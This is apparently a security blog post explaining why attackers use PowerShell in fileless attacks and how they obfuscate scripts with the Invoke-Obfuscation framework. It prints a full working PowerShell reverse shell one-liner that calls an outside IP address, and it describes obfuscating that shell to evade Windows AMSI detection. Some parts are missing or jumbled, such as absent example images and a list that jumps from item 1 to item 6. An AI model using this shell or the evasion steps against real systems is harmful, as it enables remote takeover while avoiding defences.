Fileless attacks are becoming a popular technique used by adversaries in Cyber attacks. Attackers often uses PowerShell to run file-less malware, which are non-binary files that can’t easily be detected by anti-virus solutions. Adversaries and attackers relies on the Obfuscation techniques to hide their malicious payload and to avoid detection of their attack. Today we will learn how and why attackers uses powershell.
What is the
Powershell ?
Powershell was initially created by Microsoft as a powerful task-based command-line shell and scripting language built on .NET. Windows PowerShell is a popular tool for performing admin tasks and like any useful tool can be leveraged by adversaries. Powershell can easily import modules, access core Windows APIs, execute remote commands, start a process cmdlet that can be used to run an executable, and the Invoke-Command which runs a command locally or on a remote computer. Which is makes Powershell a lethal weapon in the hands of malware writers. PowerShell provides easy access to all major functions of the operating system. The versatility of PowerShell makes it an ideal candidate for any purpose, whether the user is a defender or attacker.
Reasons why
attackers use PowerShell
1. Powershell installed by default on all new Windows computers.
2. Powershell has remote access capabilities by default
with encrypted traffic.
3. As a
script, it is easy to obfuscate.
4. Its malicious use is often not stopped or detected by traditional endpoint defenses, as files and commands are not written to disk. This means fewer artifacts to recover for forensic analysis.
Powershell
Obfuscation
Obfuscation
means to make something difficult to understand. Programming code is often
obfuscated to protect intellectual property or trade secrets and to prevent an
attacker from reverse engineering a proprietary software program. Also, Malicious
code writers also use obfuscation techniques to prevent their attack mechanisms
from being detected by antimalware tools.
What is the
most common Powershell obfuscation techniques:
In order to
understand PowerShell obfuscation techniques, we will check the following
example:
The above command will download an expression from the given URL and execute it.
Basic Powershell obfuscation techniques:
1. Split strings into multiple parts which are concatenated through the “+” operator for example.
6. Encoding – You can use Encoding techniques for obfuscating your PS commands. For this example, I used Hex encoding.
Applying all of these obfuscation techniques manually is hard. So, how we can do it automatically? For that purpose, we should use a special tool called “Invoke-Obfuscation”. Invoke-Obfuscation is an open-source obfuscation framework in PowerShell that helps you obfuscate PowerShell commands and scripts.
In order to
understand how to obfuscate PowerShell
one-liner exploits with Invoke-Obfuscation tool we will check the following
example.
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
It is just
a basic one-liner reverse shell command.
As you see when I run this command Windows Antimalware Scan Interface (AMSI) blocks this action because this command contains malicious commands.
Then I obfuscate this command using Invoke-Obfuscation tool. And when I run this obfuscated command Windows Antimalware Scan Interface (AMSI) does not block my command and Boom I have a shell.
References
https://www.danielbohannon.com/blog-1/2016/10/1/invoke-obfuscation-v11-release-sunday-oct-9
https://github.com/danielbohannon/Invoke-Obfuscation
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.